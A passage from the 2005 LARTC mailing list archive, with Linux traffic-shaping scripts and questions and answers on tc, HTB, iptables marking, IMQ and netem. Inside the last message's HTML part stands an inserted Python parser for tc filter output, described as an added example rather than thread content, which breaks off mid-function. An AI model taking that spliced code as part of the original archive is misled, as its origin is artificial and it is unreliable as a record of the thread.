> $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.30 -j MARK --set-mark 1000
> $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.30 -j MARK --set-mark 2000
>
> # 192.168.0.178
> echo " 192.168.0.178"
> $TC class add dev $DOWNIF parent 1:10 classid 1:1010 htb rate 16kbit ceil 100kbit
> $TC qdisc add dev $DOWNIF parent 1:1010 handle 1010 sfq
> $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1010 fw classid 1:1010
>
> $TC class add dev $UPIF parent 1:20 classid 1:2010 htb rate 8kbit ceil 60kbit
> $TC qdisc add dev $UPIF parent 1:2010 handle 2010 sfq
> $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2010 fw classid 1:2010
>
> $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.178 -j MARK --set-mark 1010
> $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.178 -j MARK --set-mark 2010
>
> # 192.168.0.55
> echo " 192.168.0.55"
> $TC class add dev $DOWNIF parent 1:10 classid 1:1020 htb rate 16kbit ceil 100kbit
> $TC qdisc add dev $DOWNIF parent 1:1020 handle 1020 sfq
> $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1020 fw classid 1:1020
>
> $TC class add dev $UPIF parent 1:20 classid 1:2020 htb rate 8kbit ceil 60kbit
> $TC qdisc add dev $UPIF parent 1:2020 handle 2020 sfq
> $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2020 fw classid 1:2020
>
> $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.55 -j MARK --set-mark 1020
> $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.55 -j MARK --set-mark 2020
>
> # other
> echo " other..."
> $TC class add dev $DOWNIF parent 1:10 classid 1:99 htb rate 100bit ceil 8kbit
> $TC class add dev $UPIF parent 1:20 classid 1:98 htb rate 100bit ceil 8kbit
>
> # route traffic
> echo " Traffic redirecting"
> # download
> $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.0/24 -j IMQ --todev 0
> #upload
> $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.0/24 -j IMQ --todev 1
>
> tc_status
> ;;
>
> stop)
> echo -n "Stopping traffic shaper..."
> tc_reset || return=$rc_failed
> echo -e "$return"
> ;;
>
> restart|reload)
> $0 stop && $0 start || return=$rc_failed
> ;;
>
> stats|status)
> tc_status
> ;;
>
> filter)
> tc_showfilter
> ;;
>
> *)
> echo "Usage: $0 {start|stop|restart|stats|filter}"
> esac

From junk@x-art.be Wed Jan 26 17:18:34 2005
From: junk@x-art.be (Gerry Demaret)
Date: Wed, 26 Jan 2005 18:18:34 +0100
Subject: [LARTC] Weird routing problem (2 internet connections)
Message-ID: <41F7D0EA.9030906@x-art.be>

Hello,

I have a very strange problem that I can't seem to be able to figure
out. First of all: my network scheme: http://heavyg.safehex.be/network.png

I have an agreement with my neighbour that I can use his wireless
network to experiment with extra internet uplinks in exchange for some
filesharing etc.

Now I have set up a wireless router at my place, that connects to his
network. All this works nicely, if I connect my laptop to that router
(WRT54Gs) I can use it as a gateway, internet works, cool. So far, so good.

Now, I would like to connect that router to my main gateway running
GNU/Linux 2.6.10 and already providing basic routing services through
eth0 and 1.
I used an extra network card (eth2) to connect the WRT54Gs and
assigned an IP to it in another range.

Now the strange part: from the gateway I am able to ping the WRT54Gs,
but I cannot telnet, ssh, http, whatever to it. I used tcpdump on that
interface, and I see the packets going out, but not coming back.. I
really don't understand.

Can someone please give me a hint which routes to use? I tried following
http://lartc.org/howto/lartc.rpdb.multiple-links.html but the result is
the same.. only ping works.

From 192.168.0.0/24 (internal network), nothing works towards
192.168.2.0/24 except pinging 192.168.2.1.

Thank you in advance,

Gerry.

From beatlelittle@yahoo.com.cn Thu Jan 27 01:57:57 2005
From: beatlelittle@yahoo.com.cn (CcM)
Date: Thu, 27 Jan 2005 09:57:57 +0800 (CST)
Subject: [LARTC] Ssh flow does not go into correct class. Help!
In-Reply-To:
Message-ID: <20050127015757.90282.qmail@web15510.mail.cnb.yahoo.com>

Now I want to control ports with ips specified, like following, it seems not work, only --sport effect. Ftp-data goes to ips beside 10.190.6.16 also goes into 1:12 while default is 1:13. Why?

tc qdisc add dev eth0 root handle 1: htb default 13
tc class add dev eth0 parent 1: classid 1:1 htb rate 80000kbit ceil 80000kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:11 htb rate 40kbit ceil 40kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:13 htb rate 70000kbit ceil 80000kbit prio 1
tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5
tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5
tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5

iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j MARK --set-mark 20
iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j RETURN

iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j MARK --set-mark 21
iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j RETURN

tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11
tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 21 fw flowid 1:12

"Catalin(ux aka Dino) BOIE" wrote:
On Wed, 26 Jan 2005, CcM wrote:

> It does work! Thanks!
> But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook points in ip stack, but why should be POSTROUTING here when do mangle?
>
> "Catalin(ux aka Dino) BOIE" wrote:
> Use:
> iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \
> --set-mark 20

Because locally generated packets don't go through PREROUTING.
But, best is to use OUTPUT.

---
Catalin(ux aka Dino) BOIE
catab at deuroconsult.ro
http://kernel.umbrella.ro/

From saumya@ece.ucsd.edu Thu Jan 27 02:29:54 2005
From: saumya@ece.ucsd.edu (Saumya Chandra)
Date: Wed, 26 Jan 2005 18:29:54 -0800 (PST)
Subject: [LARTC] Newbie question - limit bandwidth of a link.
Message-ID:

I just want to limit bandwidth on a particular link. Specifically, one
machine (PC1) is on wired LAN and other (PC1) on a WLAN, access point for
which is on the same LAN. Both machines have static ip addresses (AD1 and
AD2) and I want to limit the bandwidth utilization of certain udp traffic
from PC2 to PC1. Is it possible to do this using iptables and tc
(controlling from PC1 as that has both these softwares installed)? I am
using iperf to monitor the bandwidth of the link.

Thanks,

From Denis Kot Thu Jan 27 07:42:29 2005
From: Denis Kot (Denis Kot)
Date: Thu, 27 Jan 2005 09:42:29 +0200
Subject: [LARTC] negative tokens
Message-ID: <3cfad9ca0501262342794e99e4@mail.gmail.com>

I have this:

class htb 1:29 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst 1599b cburst 1611b
 Sent 33233 bytes 772 pkts (dropped 0, overlimits 0)
 lended: 415 borrowed: 357 giants: 0
 tokens: -3756376 ctokens: 128779

or this:

class htb 1:21 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst 1599b cburst 1611b
 Sent 57554 bytes 618 pkts (dropped 0, overlimits 0)
 lended: 193 borrowed: 425 giants: 0
 tokens: -484950 ctokens: 128779

and there is more like this

what´s wrong?

this is class for imq0 device (for me this is ingress device) and I have this:

imq0      Link encap:UNSPEC  HWaddr 00-00-00-FF-FF-00-00-00-00-00-00-00-00-00-00-00
          UP RUNNING NOARP  MTU:1500  Metric:1
          RX packets:131111 errors:0 dropped:0 overruns:0 frame:0
          TX packets:123371 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:30
          RX bytes:17694200 (16.8 Mb)  TX bytes:15230834 (14.5 Mb)

as you can see RX bytes doesn´t equal to TX bytes. what´s wrong?

--
Denis Kot
denis?jabber.org.by
ICQ: 13680126
Mobil: +375 29 6-1234-78

From util@deuroconsult.ro Thu Jan 27 07:47:37 2005
From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE)
Date: Thu, 27 Jan 2005 09:47:37 +0200 (EET)
Subject: [LARTC] Ssh flow does not go into correct class. Help!
In-Reply-To: <20050127015757.90282.qmail@web15510.mail.cnb.yahoo.com>
References: <20050127015757.90282.qmail@web15510.mail.cnb.yahoo.com>
Message-ID:

On Thu, 27 Jan 2005, CcM wrote:

> Now I want to control ports with ips specified, like following, it seems not work, only --sport effect. Ftp-data goes to ips beside 10.190.6.16 also goes into 1:12 while default is 1:13. Why?
>
> tc qdisc add dev eth0 root handle 1: htb default 13
> tc class add dev eth0 parent 1: classid 1:1 htb rate 80000kbit ceil 80000kbit prio 1
> tc class add dev eth0 parent 1:1 classid 1:11 htb rate 40kbit ceil 40kbit prio 1
> tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1
> tc class add dev eth0 parent 1:1 classid 1:13 htb rate 70000kbit ceil 80000kbit prio 1
> tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5
> tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5
> tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5
>
> iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j MARK --set-mark 20
> iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j RETURN
>
> iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j MARK --set-mark 21
> iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j RETURN

I bet you use passive mode in ftp so you get a weird port, not ftp-data
(20). ftp is tricky to match.
You can use this:
iptables -t mangle -A POSTROUTING -d x.x.x.x -m helper --helper ftp \
	-j MARK --set-mark 21

This will mark with 21 all ftp control+data connections.

> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11
> tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 21 fw flowid 1:12
>
> "Catalin(ux aka Dino) BOIE" wrote:
> On Wed, 26 Jan 2005, CcM wrote:
>
>> It does work! Thanks!
>> But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook points in ip stack, but why should be POSTROUTING here when do mangle?
>>
>> "Catalin(ux aka Dino) BOIE" wrote:
>> Use:
>> iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \
>> --set-mark 20
>
> Because locally generated packets don't go through PREROUTING.
> But, best is to use OUTPUT.

---
Catalin(ux aka Dino) BOIE
catab at deuroconsult.ro
http://kernel.umbrella.ro/

From sanjeev_ravindran@linuxmail.org Thu Jan 27 07:59:12 2005
From: sanjeev_ravindran@linuxmail.org (sanjeev ravindran)
Date: Thu, 27 Jan 2005 15:59:12 +0800
Subject: [LARTC] Newbie question - limit bandwidth of a link.
Message-ID: <20050127075912.D236223CF7@ws5-3.us4.outblaze.com>

Hi,

You can use tc tool to create a classful queue like HTB.. Then add a filter for your traffic...
Refer Linux Qos How to ?..
Rgds,
Sanjeev

----- Original Message -----
From: "Saumya Chandra"
To: lartc@mailman.ds9a.nl
Subject: [LARTC] Newbie question - limit bandwidth of a link.
Date: Wed, 26 Jan 2005 18:29:54 -0800 (PST)

>
> I just want to limit bandwidth on a particular link. Specifically, one
> machine (PC1) is on wired LAN and other (PC1) on a WLAN, access point for
> which is on the same LAN. Both machines have static ip addresses (AD1 and
> AD2) and I want to limit the bandwidth utilization of certain udp traffic
> from PC2 to PC1. Is it possible to do this using iptables and tc
> (controlling from PC1 as that has both these softwares installed)? I am
> using iperf to monitor the bandwidth of the link.
>
> Thanks,
> _______________________________________________
> LARTC mailing list / LARTC@mailman.ds9a.nl
> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/

From Denis Kot Thu Jan 27 11:33:16 2005
From: Denis Kot (Denis Kot)
Date: Thu, 27 Jan 2005 13:33:16 +0200
Subject: [LARTC] tc.phps
Message-ID: <3cfad9ca05012703337f45ceec@mail.gmail.com>

hello

found this script in maillist archive
how can I use this to create all class on one graph? not like for now it is one graph for each class.

--
Denis Kot
denis?jabber.org.by
ICQ: 13680126
Mobil: +375 29 6-1234-78

From andy.furniss@dsl.pipex.com Thu Jan 27 12:37:53 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Thu, 27 Jan 2005 12:37:53 +0000
Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table.
In-Reply-To: <200501261804.53584.rio@martin.mu>
References: <200501191657.15767.rio@martin.mu> <41F63E7B.30202@dsl.pipex.com> <200501261804.53584.rio@martin.mu>
Message-ID: <41F8E0A1.4060108@dsl.pipex.com>

Rio Martin.
wrote: > On Tuesday 25 January 2005 12:41, Andy Furniss wrote: > >>Is there only one proxy running? >> >>>I need to shape incoming traffic to both of these ips but i am affraid i >>>have to face that i am not able to shape traffic which is generate from >>>this box unless those two IPs were outside the box. >> >>Maybe true - maybe not you would need to test with imq. >>There is also a kernel option to do with nat of local connections. >> >>>If i have one more public IP than i should not so much worry about, cause >>>i can shape it using IMQ. > > > > I'll make it simple for you as possible. > > i have linux box which have eth0 220.1.1.1 as primary ip and aliasses: eth0:1 > 192.168.1.1 , eth0:1 192.168.1.2 > > Both 192.168.1.1 & 192.168.1.2 NATed to 220.1.1.1 > OKay, now my question is: > > How do i manage and limit traffic generated from those ips (192.168.1.1 & > 192.168.1.2) ? Not just traffic outside, but traffic coming to those ips from > Internet. > I found it so difficult because traffic coming from internet to eth0 will be > using 220.1.1.1 not 192.168.x.x If you use IMQ and get it to hook after NAT in PREROUTING then forwarded traffic should have been denatted and have local addresses. You can use TC filters to classify for htb etc. Traffic from internet to squid will probably have 220. IP address. If you want to try a way without IMQ then AIUI you can patch squid so you can classify hit/miss traffic and then you could shape traffic as egress on eth0. I don't use squid - but I assume here it limits the rate it pulls miss pages to the rate that client requests. http://www.docum.org/docum.org/faq/cache/65.html Andy. 
From andy.furniss@dsl.pipex.com Thu Jan 27 13:21:25 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Thu, 27 Jan 2005 13:21:25 +0000
Subject: [LARTC] tail and head drop qdiscs
In-Reply-To: <1106682109.5611.9.camel@localhost.localdomain>
References: <1106170939.10019.23.camel@localhost.localdomain> <41F63C51.9050207@dsl.pipex.com> <1106682109.5611.9.camel@localhost.localdomain>
Message-ID: <41F8EAD5.1080706@dsl.pipex.com>

vincent perrier wrote:
>>vincent perrier wrote:
>>
>>>I think that there are no qdiscs that permit to drop the oldest
>>>frame of a queue when this queue is full ...
>
>
>>What sort of thing do you want this for?
>>...
>>Andy.
>>
>
>
> Very low rate (satellite links for example) and strict priority can
> lead to messages waiting for a chance to be transmitted and getting
> old in low prio queues as higher priority messages take all the
> bandwidth.
> Vincent.

Ahh - if the messages established tcp then I don't think it will make any difference. If the messages are udp then I suppose it could help a bit - depends what you mean by messages.

Andy.

From andre.correa@pobox.com Thu Jan 27 14:03:59 2005
From: andre.correa@pobox.com (Andre Correa)
Date: Thu, 27 Jan 2005 12:03:59 -0200
Subject: [LARTC] Another year starts...
Message-ID: <41F8F4CF.9070702@pobox.com>

Hi list, today it turns 1 year since we started LinuxIMQ's mailing list and brought IMQ "back to life". Since then we've been trying to keep IMQ patches updated with new kernel/iptables versions and to help users the best we could.

I would really like to thank all of those good mates who helped, one way or another, including people from this list and from LARTC. It was an interesting year for me, meeting some cool people and learning a lot. I'm glad we were able to get things up-to-date and made some advancements.

I have to say I'm sorry I couldn't find more time for IMQ/documentation/iproute2/kernel stuff/user problem solving. We are aware that many issues were not addressed yet, I plan to release a wish list soon, and documentation is still pending review and clarification.

Let's try to find more time next year to make things better and keep learning. As usual any help is appreciated and wanted.

Thank you all.

Sincerely.

Andre Correa

From pedro.mindlin@poli.usp.br Thu Jan 27 14:13:17 2005
From: pedro.mindlin@poli.usp.br (Pedro Ancona Lopez Mindlin)
Date: Thu, 27 Jan 2005 12:13:17 -0200
Subject: [LARTC] netem bug?
Message-ID: <41F8F6FD.6040408@poli.usp.br>

Hi all,

I'm running some tests with netem and I noticed some strange behaviour that looks like a bug: I'm pinging another machine and adding delay with netem. When I tell netem to give me a 10ms delay, it works fine. The problem is that when I ask for a 11ms delay, it gives me 20ms! It happens for any value between 11ms and 20ms, and it repeats for values over 20ms, now rounding up to 30ms.

Here is an example:

# ping x.x.x.x
PING x.x.x.x (x.x.x.x) 56(84) bytes of data.
64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=0.197 ms
64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=0.100 ms
64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=0.081 ms
64 bytes from x.x.x.x: icmp_seq=4 ttl=64 time=0.099 ms

# tc qdisc add dev eth0 root netem delay 10ms
# ping x.x.x.x
PING x.x.x.x (x.x.x.x) 56(84) bytes of data.
64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=1.11 ms 64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=9.04 ms 64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=9.24 ms 64 bytes from x.x.x.x: icmp_seq=4 ttl=64 time=10.0 ms # tc qdisc change dev eth0 root netem delay 11ms # ping x.x.x.x PING x.x.x.x (x.x.x.x) 56(84) bytes of data. 64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=13.1 ms 64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=20.0 ms 64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=20.0 ms 64 bytes from x.x.x.x: icmp_seq=4 ttl=64 time=20.0 ms # tc qdisc change dev eth0 root netem delay 23ms # ping x.x.x.x PING x.x.x.x (x.x.x.x) 56(84) bytes of data. 64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=22.2 ms 64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=29.8 ms 64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=29.1 ms 64 bytes from x.x.x.x: icmp_seq=4 ttl=64 time=30.0 ms # uname -a Linux yyy 2.4.27-1-386 #1 Fri Sep 3 06:24:46 UTC 2004 i686 GNU/Linux Is this a known bug? Is there any fix? I also noticed that the first ping has always a smaller value. Can someone explain that? Thanks, Pedro. From util@deuroconsult.ro Thu Jan 27 14:42:27 2005 From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Thu, 27 Jan 2005 16:42:27 +0200 (EET) Subject: [LARTC] netem bug? In-Reply-To: <41F8F6FD.6040408@poli.usp.br> References: <41F8F6FD.6040408@poli.usp.br> Message-ID: > Hi all, > > I'm running some tests with netem and I noticed some strange behaviour that > looks like a bug: I'm pinging another machine and adding delay with netem. > When I tell netem to give me a 10ms delay, it works fine. The problem is that > when I ask for a 11ms delay, it gives me 20ms! It happens for any value > between 11ms an 20ms, and it repeats for values over 20ms, now rounding up to > 30ms. > > Here is an example: > > # ping x.x.x.x > PING x.x.x.x (x.x.x.x) 56(84) bytes of data. 
> 64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=0.197 ms > 64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=0.100 ms > 64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=0.081 ms > 64 bytes from x.x.x.x: icmp_seq=4 ttl=64 time=0.099 ms > > # tc qdisc add dev eth0 root netem delay 10ms > # ping x.x.x.x > PING x.x.x.x (x.x.x.x) 56(84) bytes of data. > 64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=1.11 ms > 64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=9.04 ms > 64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=9.24 ms > 64 bytes from x.x.x.x: icmp_seq=4 ttl=64 time=10.0 ms > > > # tc qdisc change dev eth0 root netem delay 11ms > # ping x.x.x.x > PING x.x.x.x (x.x.x.x) 56(84) bytes of data. > 64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=13.1 ms > 64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=20.0 ms > 64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=20.0 ms > 64 bytes from x.x.x.x: icmp_seq=4 ttl=64 time=20.0 ms > > # tc qdisc change dev eth0 root netem delay 23ms > # ping x.x.x.x > PING x.x.x.x (x.x.x.x) 56(84) bytes of data. > 64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=22.2 ms > 64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=29.8 ms > 64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=29.1 ms > 64 bytes from x.x.x.x: icmp_seq=4 ttl=64 time=30.0 ms > > # uname -a > Linux yyy 2.4.27-1-386 #1 Fri Sep 3 06:24:46 UTC 2004 i686 GNU/Linux > > > Is this a known bug? Is there any fix? I also noticed that the first ping has > always a smaller value. Can someone explain that? The "problem" is the 2.4 kernel because HZ is 100. Ping is not rescheduled quickly enough to measure correctly the rtt. On my 2.6 kernel (HZ=1000) it work almost perfect. Hope it helps. > > Thanks, > > Pedro. 
> > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ From lartc@nospam.otaku42.de Thu Jan 27 15:09:30 2005 From: lartc@nospam.otaku42.de (Michael Renzmann) Date: Thu, 27 Jan 2005 16:09:30 +0100 Subject: [LARTC] netem bug? In-Reply-To: References: <41F8F6FD.6040408@poli.usp.br> Message-ID: <41F9042A.9090400@otaku42.de> Hi. Catalin(ux aka Dino) BOIE wrote: > The "problem" is the 2.4 kernel because HZ is 100. That was my idea, too. > On my 2.6 kernel (HZ=1000) it work almost perfect. If the OP thinks of changing HZ, the following links might be a good help: http://www.plumlocosoft.com/kernel/ (especially 013-j64.diff.bz2 and 014-vhz.diff.bz2) http://kerneltrap.org/node/464/1528 The mentioned patches allow to change HZ to something else than 100 while retaining compatibility to userspace and other stuff that might rely on HZ being 100. Note that kernel image as well as (most probably all) modules have to be recompiled and replaced for the patch to take effect. 
Bye, Mike

From stef.coene@docum.org Thu Jan 27 08:24:47 2005
From: stef.coene@docum.org (Stef Coene)
Date: Thu, 27 Jan 2005 09:24:47 +0100
Subject: [LARTC] negative tokens
In-Reply-To: <3cfad9ca0501262342794e99e4@mail.gmail.com>
References: <3cfad9ca0501262342794e99e4@mail.gmail.com>
Message-ID: <200501270924.48056.stef.coene@docum.org>

On Thursday 27 January 2005 08:42, Denis Kot wrote:
> I have this:
> class htb 1:29 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst
> 1599b cburst 1611b
> Sent 33233 bytes 772 pkts (dropped 0, overlimits 0)
> lended: 415 borrowed: 357 giants: 0
> tokens: -3756376 ctokens: 128779
>
> or this:
> class htb 1:21 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst
> 1599b cburst 1611b
> Sent 57554 bytes 618 pkts (dropped 0, overlimits 0)
> lended: 193 borrowed: 425 giants: 0
> tokens: -484950 ctokens: 128779
>
> and there is more like this
> what´s wrong?
Nothing.
To understand what's going on, I need the tc commands you use to create the htb classes.

> this is class for imq0 device (for me this is ingres device) and I have
> this: imq0 Link encap:UNSPEC HWaddr
> 00-00-00-FF-FF-00-00-00-00-00-00-00-00-00-00-00
> UP RUNNING NOARP MTU:1500 Metric:1
> RX packets:131111 errors:0 dropped:0 overruns:0 frame:0
> TX packets:123371 errors:0 dropped:0 overruns:0 carrier:0
> collisions:0 txqueuelen:30
> RX bytes:17694200 (16.8 Mb) TX bytes:15230834 (14.5 Mb)
>
> as you can see RX bytes doesn´t equal to TX bytes. what´s wrong?
That means that some packets are dropped because you shape on that interface.

Stef
Stef From jacob martinson Thu Jan 27 18:00:14 2005 From: jacob martinson (jacob martinson) Date: Thu, 27 Jan 2005 12:00:14 -0600 Subject: [LARTC] question about filter priorities and "tc -d filter show" output Message-ID: <5b747959050127100044c0f@mail.gmail.com> The interface is setup like this: # tc qdisc del dev eth0 root # tc qdisc add dev eth0 root handle 1: htb default 2 # tc class add dev eth0 parent 1: classid 1:2 htb rate 20mbit ceil 20mbit If I add a second class and a filter to send traffic to it like this: # tc class add dev eth0 parent 1: classid 1:130 htb rate 1Mbit ceil 1Mbit # tc filter add dev eth0 protocol ip parent 1:0 prio 130 u32 match ip dst \ > 1.1.1.10 flowid 1:130 The output of "tc -d filter show dev eth0" makes sense to me and looks like this: filter parent 1: protocol ip pref 130 u32 filter parent 1: protocol ip pref 130 u32 fh 800: ht divisor 1 filter parent 1: protocol ip pref 130 u32 fh 800::800 order 2048 key ht 800 bkt 0 flowid 1:130 match 0101010a/ffffffff at 16 If I add a third class and a filter for it, things start looking weird to me: # tc filter add dev eth0 protocol ip parent 1:0 prio 131 u32 match ip dst 1.1.1.11 \ > flowid 1:131 # tc class add dev eth0 parent 1: classid 1:132 htb rate 1Mbit ceil 1Mbit # tc -d filter show dev eth0 filter parent 1: protocol ip pref 130 u32 filter parent 1: protocol ip pref 130 u32 fh 801: ht divisor 1 filter parent 1: protocol ip pref 130 u32 fh 801::800 order 2048 key ht 801 bkt 0 flowid 1:131 match 0101010b/ffffffff at 16 filter parent 1: protocol ip pref 130 u32 fh 800: ht divisor 1 filter parent 1: protocol ip pref 130 u32 fh 800::800 order 2048 key ht 800 bkt 0 flowid 1:130 match 0101010a/ffffffff at 16 filter parent 1: protocol ip pref 131 u32 filter parent 1: protocol ip pref 131 u32 fh 801: ht divisor 1 filter parent 1: protocol ip pref 131 u32 fh 801::800 order 2048 key ht 801 bkt 0 flowid 1:131 match 0101010b/ffffffff at 16 filter parent 1: protocol ip pref 131 u32 fh 800: ht divisor 
1 filter parent 1: protocol ip pref 131 u32 fh 800::800 order 2048 key ht 800 bkt 0 flowid 1:130 match 0101010a/ffffffff at 16 If N is the number of filters I have on the root qdisc, I get N-squared entries from the "show filter" command. Can someone explain how this works or point me to documentation that explains it? My system doesn't have a "tc-filters" manpage. Thanks! -Jacob From rsenykoff@harrislogic.com Thu Jan 27 19:50:11 2005 From: rsenykoff@harrislogic.com (rsenykoff@harrislogic.com) Date: Thu, 27 Jan 2005 13:50:11 -0600 Subject: [LARTC] Linux Bridge + QoS Shaper HOWTO available Message-ID: This is a multipart message in MIME format. --=_alternative 006CF72286256F96_= Content-Type: text/plain; charset="US-ASCII" I've created a pretty complete HOWTO on creating a Linux Bridge (using Fedora) to shape LAN <--> WAN traffic. It includes installation instructions, a script to configure the bridge (which you install as a service), and 2 scripts to configure the network interfaces using traffic control. http://www.burnpc.com/website.nsf/all/3a64a6369757819686256f960068ad75!OpenDocument If anyone has any questions or feedback I'm very interested. This configuration has evolved over the past 6 months and is somewhat tweaked. The highest priority traffic in my config, is of course, IAX2 (Asterisk VoIP protocol). Regards, Ron --=_alternative 006CF72286256F96_= Content-Type: text/html; charset="US-ASCII"
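Jacob's "tc -d filter show" listing above repeats the same u32 entries under every pref and prints each match as raw hex. The following is an added example, not code from the thread: a Python parser that collapses the repeated entries and decodes matches at IPv4 header offsets 12 and 16 into source and destination prefixes. The sample input is the listing from his post re-broken one entry per line, and the function names are this example's own.

```python
import ipaddress
import re

# Constructed sample: the listing from Jacob's post, one entry per line.
SAMPLE = """\
filter parent 1: protocol ip pref 130 u32
filter parent 1: protocol ip pref 130 u32 fh 801: ht divisor 1
filter parent 1: protocol ip pref 130 u32 fh 801::800 order 2048 key ht 801 bkt 0 flowid 1:131
  match 0101010b/ffffffff at 16
filter parent 1: protocol ip pref 130 u32 fh 800: ht divisor 1
filter parent 1: protocol ip pref 130 u32 fh 800::800 order 2048 key ht 800 bkt 0 flowid 1:130
  match 0101010a/ffffffff at 16
filter parent 1: protocol ip pref 131 u32
filter parent 1: protocol ip pref 131 u32 fh 801: ht divisor 1
filter parent 1: protocol ip pref 131 u32 fh 801::800 order 2048 key ht 801 bkt 0 flowid 1:131
  match 0101010b/ffffffff at 16
filter parent 1: protocol ip pref 131 u32 fh 800: ht divisor 1
filter parent 1: protocol ip pref 131 u32 fh 800::800 order 2048 key ht 800 bkt 0 flowid 1:130
  match 0101010a/ffffffff at 16
"""

# A rule line carries a full table:bucket:item handle and a flowid;
# hash-table lines ("fh 800: ht divisor 1") have neither and are skipped.
RULE_RE = re.compile(
    r"^filter .*\bpref (?P<pref>\d+) u32 "
    r"fh (?P<fh>[0-9a-f]+:[0-9a-f]*:[0-9a-f]+) .*\bflowid (?P<flowid>\S+)"
)
MATCH_RE = re.compile(
    r"^\s*match (?P<val>[0-9a-f]{8})/(?P<mask>[0-9a-f]{8}) at (?P<off>-?\d+)"
)

# Byte offsets of the address fields in the IPv4 header.
IPV4_ADDR_FIELDS = {12: "src", 16: "dst"}


def decode_match(value_hex, mask_hex, offset):
    """Turn 'match VALUE/MASK at OFFSET' into 'ip src|dst CIDR' when possible."""
    value, mask = int(value_hex, 16), int(mask_hex, 16)
    field = IPV4_ADDR_FIELDS.get(offset)
    plen = bin(mask).count("1")
    contiguous = mask == (0xFFFFFFFF << (32 - plen)) & 0xFFFFFFFF
    if field is None or not contiguous:
        # Not an address field, or a mask that is not a prefix: keep it raw.
        return f"raw {value_hex}/{mask_hex} at {offset}"
    return f"ip {field} {ipaddress.ip_network((value & mask, plen))}"


def parse_filters(text):
    """Return every listed rule, in order, with its decoded match lines."""
    rules, current = [], None
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            current = {"pref": int(m["pref"]), "fh": m["fh"],
                       "flowid": m["flowid"], "matches": []}
            rules.append(current)
            continue
        m = MATCH_RE.match(line)
        if m and current is not None:
            current["matches"].append(
                decode_match(m["val"], m["mask"], int(m["off"])))
        elif line.startswith("filter"):
            current = None  # header or hash-table line ends the previous rule
    return rules


def unique_rules(rules):
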